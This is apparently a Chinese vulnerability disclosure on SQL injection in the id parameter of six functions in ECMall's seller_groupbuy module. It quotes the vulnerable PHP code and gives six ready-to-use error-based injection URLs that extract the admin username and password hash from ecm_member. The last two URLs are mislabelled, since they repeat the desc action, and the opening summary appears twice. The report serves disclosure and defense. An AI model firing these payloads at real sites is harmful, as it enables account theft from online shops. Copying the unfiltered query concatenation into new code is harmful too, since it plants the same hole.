### 简要描述: RT ### 详细说明: 搜了下,发现/app/seller_groupbuy.app.php里面还有6处注入: 分别是该文件下drop(),start(),finished(),desc(),cancel(),log()函数中的id参数 以finished()为例: ``` function finished() { $id = empty($_GET['id']) ? 0 : $_GET['id'];//id参数未过滤 if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) //进入_ican函数,跟进 { $this->show_warning('Hacking Attempt'); return; } /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_name', )); if (!$this->_groupbuy_mod->edit($id, array('state' => GROUP_FINISHED, 'end_time' => gmtime()))) { $this->show_warning($this->_groupbuy_mod->get_error()); return; } $content = get_msg('tobuyer_groupbuy_finished_notify', array('group_name' => $group['group_name'], 'id' => $id)); $this->_groupbuy_mod->sys_notice( $id, array('buyer'), '', $content, array('msg') ); $this->show_message('finished_ok'); } ``` _ican函数代码: ``` function _ican($id, $act = '') { $state_permission = array(...
### 简要描述: RT ### 详细说明: 搜了下,发现/app/seller_groupbuy.app.php里面还有6处注入: 分别是该文件下drop(),start(),finished(),desc(),cancel(),log()函数中的id参数 以finished()为例: ``` function finished() { $id = empty($_GET['id']) ? 0 : $_GET['id'];//id参数未过滤 if (!$id) { $this->show_warning('no_such_groupbuy'); return false; } if (!$this->_ican($id, ACT)) //进入_ican函数,跟进 { $this->show_warning('Hacking Attempt'); return; } /* 团购信息 */ $group = $this->_groupbuy_mod->get(array( 'conditions' => 'group_id=' . $id, 'fields' => 'group_name', )); if (!$this->_groupbuy_mod->edit($id, array('state' => GROUP_FINISHED, 'end_time' => gmtime()))) { $this->show_warning($this->_groupbuy_mod->get_error()); return; } $content = get_msg('tobuyer_groupbuy_finished_notify', array('group_name' => $group['group_name'], 'id' => $id)); $this->_groupbuy_mod->sys_notice( $id, array('buyer'), '', $content, array('msg') ); $this->show_message('finished_ok'); } ``` _ican函数代码: ``` function _ican($id, $act = '') { $state_permission = array( GROUP_PENDING => array('start', 'edit', 'drop'), GROUP_ON => array('cancel', 'desc', 'log', 'finished', 'export_ubbcode'), GROUP_END => array('cancel', 'desc', 'finished', 'log'), GROUP_FINISHED => array('drop', 'log', 'view_order'), GROUP_CANCELED => array('drop', 'log') ); $group = $this->_groupbuy_mod->get(array( 'join' => 'belong_goods', 'conditions' => 'gb.group_id=' . $id . ' AND g.store_id=' . $this->_store_id,// id参数未过滤直接带入查询 'fields' => 'gb.state', )); if (!$group) { return false; // 越权或没有该团购 } if (empty($act)) { return $state_permission[$group['state']]; // 返回该团购此状态时允许的操作 } return in_array($act, $state_permission[$group['state']]) ? true : false; // 该团购此状态是否允许执行此操作 } ``` ### 漏洞证明: exp1(finished函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=finished&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ``` [<img src="https://images.seebug.org/upload/201406/10182230104f7fd73e0ee32d584abb20be548ebe.jpg" alt="e.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/10182230104f7fd73e0ee32d584abb20be548ebe.jpg) exp2(drop函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=drop&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ``` exp3(srart函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=start&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ``` exp4:(desc函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=desc&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ``` exp5:(cancel函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=desc&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ``` exp6:(log函数): ``` http://localhost/ecmall/index.php?app=seller_groupbuy&act=desc&id=2%20and%20(select%20user_name%20from%20ecm_member%20where%20user_id=1%20union%20select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20ecm_member%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)# ```
